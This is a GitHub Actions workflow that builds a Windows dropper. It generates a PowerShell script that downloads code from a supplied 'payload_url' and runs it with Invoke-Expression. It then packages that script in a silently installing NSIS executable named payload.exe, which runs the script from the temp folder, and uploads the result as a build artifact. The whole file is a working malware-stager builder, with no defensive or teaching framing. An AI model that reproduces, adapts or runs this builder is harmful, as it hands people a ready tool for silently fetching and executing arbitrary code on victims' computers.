name: Build PowerShell EXE using NSIS

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Install NSIS
      shell: powershell
      run: choco install nsis -y

    - name: Generate PowerShell script
      shell: powershell
      run: |
        $payloadUrl = "${{ github.event.inputs.payload_url }}"
        $scriptPath = "script.ps1"
        Set-Content -Path $scriptPath -Value "function Fetch-Execute {"
        Add-Content -Path $scriptPath -Value "    param ([string]`$url)"
        Add-Content -Path $scriptPath -Value "    try {"
        Add-Content -Path $scriptPath -Value "        `$response = (New-Object System.Net.WebClient).DownloadString(`$url)"
        Add-Content -Path $scriptPath -Value "        Invoke-Expression `$response"
        Add-Content -Path $scriptPath -Value "    } catch {"
        Add-Content -Path $scriptPath -Value "        Write-Host `"Error: Cannot fetch or execute script.`""
        Add-Content -Path $scriptPath -Value "    }"
        Add-Content -Path $scriptPath -Value "}"
        Add-Content -Path $scriptPath -Value "Fetch-Execute -url `"$payloadUrl`""

    - name: Generate NSIS Script
      shell: powershell
      run: |
        $nsisPath = "script.nsi"
        Set-Content -Path $nsisPath -Value '!define OUTPUT "payload.exe"'
        Add-Content -Path $nsisPath -Value 'Outfile "${OUTPUT}"'
        Add-Content -Path $nsisPath -Value 'SilentInstall silent'
        Add-Content -Path $nsisPath -Value 'RequestExecutionLevel user'
        Add-Content -Path $nsisPath -Value 'Section'
        Add-Content -Path $nsisPath -Value '  SetOutPath $TEMP'
        Add-Content -Path $nsisPath -Value '  File "script.ps1"'
        Add-Content -Path $nsisPath -Value '  nsExec::Exec "powershell.exe -ExecutionPolicy RemoteSigned -File $TEMP\script.ps1"'
        Add-Content -Path $nsisPath -Value 'SectionEnd'

    - name: Build EXE using NSIS
      shell: cmd
      run: makensis script.nsi

    - name: Upload EXE Artifact
      uses: actions/upload-artifact@v4
      with:
        name: payload_exe
        path: payload.exe
